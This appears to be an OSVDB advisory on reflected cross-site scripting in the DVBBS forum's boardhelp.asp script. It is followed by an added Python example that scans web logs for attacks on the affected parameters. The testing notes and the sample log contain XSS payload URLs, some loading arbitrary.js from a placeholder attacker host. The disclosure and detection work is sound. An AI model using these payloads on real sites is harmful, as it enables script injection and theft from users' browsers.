DVBBS boardhelp.asp Multiple Variable XSS

2005-07-21T00:58:07
ID OSVDB:18512
Type osvdb
Reporter Lostmon Lords (Lostmon@gmail.com)
Modified 2005-07-21T00:58:07

Description

Vulnerability Description

DVBBS contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate the 'title', 'view' and 'act' variables upon submission to the 'boardhelp.asp' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

DVBBS contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate the 'title', 'view' and 'act' variables upon submission to the 'boardhelp.asp' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Manual Testing Notes

http://[target]/boardhelp.asp?boardid=0&act=2&title="><script%20src=http://[attacker]/arbitrary.js></script>

http://[target]/boardhelp.asp?boardid=0&view=faq"><script%20src=http://[attacker]/arbitrary.js></script>&act=3

http://[target]/boardhelp.asp?boardid=0&view=faq&act=3"><script>alert()</script>

http://[target]/boardhelp.asp?boardid=0&act=2"><script>alert()</script>&title=等级设置
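The testing notes above show the payload shape: a quote and angle bracket to break out of the attribute or tag into which boardhelp.asp reflects the parameter, followed by a script element. A web server or proxy log therefore carries enough to detect attempts against the three named variables after the fact. The following is an added detection example, not code from the advisory or from DVBBS: it parses a few constructed IIS-style log lines (field order and IP addresses are assumed and made up), URL-decodes the query string, and flags requests to boardhelp.asp whose 'title', 'view' or 'act' value contains markup. The `WATCHED_PARAMS`, `MARKUP_RE`, `scan_log` and other names are this example's own.

```python
import re
from urllib.parse import parse_qsl, unquote

# Parameters the advisory names as unvalidated in boardhelp.asp.
WATCHED_PARAMS = {"title", "view", "act"}

# Markup that has no legitimate place in these parameters. A match means the
# value tries to leave the attribute/tag context the script reflects it into.
MARKUP_RE = re.compile(r'[<>"]|</?script|javascript:|on\w+\s*=', re.IGNORECASE)

# Constructed sample log (assumed IIS W3C-style field order):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
# Lines 1 and 3 mirror the advisory's test URLs; the others are benign.
SAMPLE_LOG = """\
2005-07-21 00:58:07 203.0.113.5 GET /boardhelp.asp boardid=0&act=2&title=%22%3E%3Cscript%20src=http://198.51.100.9/arbitrary.js%3E%3C/script%3E 200
2005-07-21 00:58:09 203.0.113.5 GET /boardhelp.asp boardid=0&view=faq&act=3 200
2005-07-21 00:58:11 198.51.100.7 GET /boardhelp.asp boardid=0&view=faq&act=3%22%3E%3Cscript%3Ealert()%3C/script%3E 200
2005-07-21 00:58:12 198.51.100.7 GET /index.asp boardid=0&title=%3Cscript%3E 200
2005-07-21 00:58:13 192.0.2.44 GET /boardhelp.asp boardid=0&act=2&title=%E7%AD%89%E7%BA%A7 200
"""


def parse_line(line):
    """Split one constructed log line into a record; '-' means an empty query."""
    _date, _time, ip, method, stem, query, status = line.split()
    return {
        "ip": ip,
        "method": method,
        "stem": stem,
        "query": "" if query == "-" else query,
        "status": status,
    }


def suspicious_params(query):
    """Return [(name, decoded_value)] for watched parameters that carry markup."""
    hits = []
    # parse_qsl splits on '&' and on the first '=' only, so a payload that
    # itself contains '=' (e.g. 'src=http://...') stays inside the value.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() not in WATCHED_PARAMS:
            continue
        # parse_qsl already decoded once; decode again so a double-encoded
        # payload is also seen. Record the first form that matches.
        for candidate in (value, unquote(value)):
            if MARKUP_RE.search(candidate):
                hits.append((name, candidate))
                break
    return hits


def scan_log(text):
    """Scan log text and return one alert per suspicious parameter value."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        # Only the vulnerable script is of interest here.
        if not rec["stem"].lower().endswith("/boardhelp.asp"):
            continue
        for name, value in suspicious_params(rec["query"]):
            alerts.append({"ip": rec["ip"], "param": name, "value": value})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert['ip']} param={alert['param']} value={alert['value']!r}")
```

Note that a non-ASCII title (the last sample line, like the advisory's fourth test URL) is not flagged on its own: the rule keys on the break-out characters, not on the character set. On the application side the generic remedy for this class of flaw is to HTML-encode every reflected parameter before writing it into the page (in classic ASP, `Server.HTMLEncode`); the advisory itself records no vendor fix.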

References:

Vendor URL: http://down.dvbbs.net/SoftView/SoftView_2455.html
Security Tracker: 1014632
Related OSVDB ID: 18679
Related OSVDB ID: 18680
Other Advisory URL: http://lostmon.blogspot.com/2005/08/dvbbs-multiple-variable-cross-site.html
ISS X-Force ID: 21743
CVE-2005-2588
Bugtraq ID: 14498